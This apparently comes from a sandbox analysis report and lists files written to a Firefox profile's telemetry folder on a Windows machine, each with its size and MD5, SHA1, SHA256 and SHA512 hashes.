SHA15031b3cbf0e2a74c1ca5bf303667afadb5e32c96
SHA256d54caa48ed64cd2ab7b56875a4fc58164756a7845d3d1331d96aa235ee2ace52
SHA5122a648ee0dc7e391b091fde193c8400189053d03f7a96d07cf3263b437aeac7cf433c379c5efd16d4c2ef45a7f25cf12449933d863bb3b230a93d4f2eeee85d10
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\pending_pings\ac227d56-d0aa-4342-bb2c-748a8a69a672
Filesize2KB
MD5f56ce70f053d6a1258d0aeab8f322e8e
SHA158e138bc6a8e43a98ca71ab3fcb01b72323e127c
SHA256646d991cb61695903976dab74e575c3798ffe1341e40b3eebbb1b0702adf22ac
SHA5122dcd84fc40b05a63122a16e8cda4ab32c65bd242fa49f348cc9301b408ac9fbef7811b273934fe8a633f448af0f0a07af623a39cdb21e97597592ef913aed0aa
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\pending_pings\dd310b21-2db3-428f-9c29-f2e7edcd16cd
Filesize883B
MD5cbeeafd6955166b297e3962d7fe6f150
SHA1081b384497121aca5c449cc194b5b537273eb6de
SHA256eda5a29c7c88d2da64cc14e163f2f7f3fd8c4e8aad72fa9991ae6d13ee0d2c02
SHA512a979393bb8d4f24307c8b87deeb1da4fbafbefc349f7fe6eabd427e09a505820472f28a9aae07d2c0fe0b8665b530394ce7669221e50c14b0fdd51b2296c5478
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\pending_pings\e80f646e-e998-4d2f-811f-77df7561f7d0
Filesize235B
MD591996fd9a992702abe45f9c5a86f0dc6
SHA10d280398747cacb0c2ceb719c534e0c9acc8299a
SHA256b1206bb989f261785837686dfb13cda9d0249e1b1f77d6572b79d618c4e2dd21
SHA5128fb028c6661eefae8d90fccdb1b5954ff3322859b82eb0e415fadb586ae26642156a1992f6cd04b60a3b13ae76c23724d4a1ef3bcbd62884137a24db0f127b61
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\pending_pings\fc313bfb-3f25-44bf-b938-6e1cc15dcad3
Filesize886B
MD5c0e3b82809f96c20bdb3b76c94d8c45f
SHA17e40bbd4ce6aa756f8a7226b76d9048997ca8b27
SHA2567698571a5fbf2d9362f0b27829359c2b0171c20d1b3be608bb398683d4356cec
SHA512bb1da9ef567a8615bae3d6363f2ea728bbb7801f192e9eacf9b180d968ac151e48107166cc0aac0e119c8016f34176b1fb4118074eeaee5ead2656584271f424
-
Filesize
6KB
MD50122105a991e38fc65a55e5b193042c7
SHA1b3c80fecabf13df7776ecd236e23bdc166174f9f
SHA256b04d0d3bc73a33360c3486015c3ac500265637f70eb790dedc6a0abad4a8989d
SHA512512496836996f4d4e9f1161801e95407b477f52ccc606d60b918bc5a98640fadb5ad7eb6055798690e9e73f48607d4d792cd20a24d32521c0874a5815c0d8110
-
Filesize
6KB
MD55fd13d86a2bd2e1ff7a1f03d4faa2bf2
SHA115fb5bd26b6c2b21c17f7e8a61df3d3667f795dd
SHA2564e649c0ffe6cda57db4f8149b596ff65e4dd34866b5954583e25dba6d7135f68
SHA512b9bdb5954283aa8b8f516a06503cb9f8e29c5c73a9d84ee0ea450723c4dcf4227550a07b70b4f1c254621635b8ec938d33c70d30659615feb666d28ca6e94c23
-
Filesize
6KB
MD563e3b1a32f3995311ab40e722f25e927
SHA1a39ddcf756a6fb216c8a7db1641a133a6044d689
SHA256dd6821ac79797ed9876a47f0b6efe48198188b01adb451a6178f24b7ef338b53
SHA51211cfbb67fb4e958ddb9b7e56e7ff82cce21f6ff7c82bf46d527aee6cea1097b8dab6fb8e824cf4d129646e185cdd68235b1d0c3bfbcaeaa4d7553e4ad44d4ff3